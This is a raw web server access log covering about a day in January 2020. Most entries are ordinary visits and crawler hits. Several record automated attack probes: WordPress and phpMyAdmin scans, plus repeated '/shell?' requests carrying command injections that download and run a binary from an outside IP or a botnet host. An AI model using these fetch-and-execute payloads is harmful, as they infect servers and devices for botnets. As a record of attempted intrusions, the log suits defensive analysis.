179.106.102.12 - - [16/Jan/2020:06:46:38 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
36.68.99.121 - - [16/Jan/2020:06:58:51 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
64.246.165.210 - - [16/Jan/2020:07:11:11 +0100] "GET /robots.txt HTTP/1.0" 404 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
64.246.165.210 - - [16/Jan/2020:07:11:12 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:59.0) Gecko/20100101 Firefox/59.0"
54.36.150.136 - - [16/Jan/2020:07:16:57 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
103.28.112.247 - - [16/Jan/2020:07:43:10 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
51.91.150.117 - - [16/Jan/2020:07:46:45 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:45 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:46 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:46 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:46 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:46 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:46 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:47 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:47 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
51.91.150.117 - - [16/Jan/2020:07:46:47 +0100] "" 400 0 "-" "-"
139.211.165.112 - - [16/Jan/2020:07:47:04 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
42.236.10.79 - - [16/Jan/2020:07:51:44 +0100] "GET / HTTP/1.1" 200 65 "http://cfpt.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
5.202.145.141 - - [16/Jan/2020:08:15:28 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
195.60.190.155 - - [16/Jan/2020:08:34:27 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
195.60.190.155 - - [16/Jan/2020:08:34:28 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
110.44.123.56 - - [16/Jan/2020:09:13:22 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
87.251.139.245 - - [16/Jan/2020:09:44:21 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
139.162.106.181 - - [16/Jan/2020:09:49:26 +0100] "GET / HTTP/1.1" 200 41 "-" "HTTP Banner Detection (https://security.ipip.net)"
71.6.232.9 - - [16/Jan/2020:10:06:27 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
151.54.163.52 - - [16/Jan/2020:10:11:55 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
222.188.81.98 - - [16/Jan/2020:10:21:07 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 136 "-" "ZmEu"
222.188.81.98 - - [16/Jan/2020:10:21:08 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 136 "-" "ZmEu"
222.188.81.98 - - [16/Jan/2020:10:21:08 +0100] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 136 "-" "ZmEu"
110.139.41.95 - - [16/Jan/2020:10:33:42 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
77.49.130.153 - - [16/Jan/2020:13:00:55 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
54.36.148.156 - - [16/Jan/2020:13:06:36 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.150.7 - - [16/Jan/2020:13:06:37 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
54.36.150.164 - - [16/Jan/2020:13:11:28 +0100] "GET /88-google-a-bien-modernise-l-affichage-de-son-moteur-de-recherche HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
34.218.248.211 - - [16/Jan/2020:14:53:54 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
178.128.112.92 - - [16/Jan/2020:15:01:06 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
27.123.255.236 - - [16/Jan/2020:15:04:13 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.236 - - [16/Jan/2020:15:04:15 +0100] "GET /wp-login.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.236 - - [16/Jan/2020:15:04:16 +0100] "" 400 0 "-" "-"
18.219.233.44 - - [16/Jan/2020:15:30:32 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
18.219.233.44 - - [16/Jan/2020:15:30:38 +0100] "" 400 0 "-" "-"
69.50.245.38 - - [16/Jan/2020:16:00:00 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
2.187.85.254 - - [16/Jan/2020:16:21:25 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
47.206.0.32 - - [16/Jan/2020:17:01:50 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
27.123.255.236 - - [16/Jan/2020:18:19:08 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.236 - - [16/Jan/2020:18:19:09 +0100] "GET /wp-login.php HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
27.123.255.236 - - [16/Jan/2020:18:19:10 +0100] "" 400 0 "-" "-"
191.17.152.235 - - [16/Jan/2020:18:26:44 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
66.249.76.75 - - [16/Jan/2020:18:49:03 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.75 - - [16/Jan/2020:18:49:03 +0100] "GET /ads.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.188.81.98 - - [16/Jan/2020:18:50:06 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 136 "-" "ZmEu"
82.30.43.173 - - [16/Jan/2020:18:56:09 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
54.36.150.185 - - [16/Jan/2020:19:08:37 +0100] "GET /178-carmi-la-malice HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
159.203.197.20 - - [16/Jan/2020:19:14:00 +0100] "GET /manager/html HTTP/1.1" 404 136 "-" "Mozilla/5.0 zgrab/0.x"
189.222.92.179 - - [16/Jan/2020:20:22:25 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
164.68.112.178 - - [16/Jan/2020:20:29:28 +0100] "GET / HTTP/1.0" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
54.36.150.95 - - [16/Jan/2020:20:43:30 +0100] "GET /177-le-pere-d-alien-est-decede HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"
18.218.117.197 - - [16/Jan/2020:21:48:42 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:43 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:43 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:44 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:44 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:45 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:45 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:46 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:46 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
18.218.117.197 - - [16/Jan/2020:21:48:46 +0100] "" 400 0 "-" "-"
24.48.237.134 - - [16/Jan/2020:22:20:16 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
190.55.3.166 - - [16/Jan/2020:22:25:22 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
45.166.33.130 - - [16/Jan/2020:22:25:37 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
177.190.176.99 - - [16/Jan/2020:23:13:15 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
102.158.174.109 - - [16/Jan/2020:23:32:34 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
80.20.115.81 - - [17/Jan/2020:00:06:32 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
52.40.3.94 - - [17/Jan/2020:00:31:18 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
34.87.199.225 - - [17/Jan/2020:00:58:45 +0100] "OPTIONS / HTTP/1.0" 405 166 "-" "-"
91.192.204.89 - - [17/Jan/2020:02:07:15 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
93.144.81.166 - - [17/Jan/2020:02:19:51 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
107.6.183.226 - - [17/Jan/2020:03:47:51 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
82.76.210.137 - - [17/Jan/2020:04:42:16 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
165.227.47.246 - - [17/Jan/2020:05:53:22 +0100] "GET /index.php HTTP/1.1" 404 162 "-" "-"
165.73.60.72 - - [17/Jan/2020:06:18:53 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
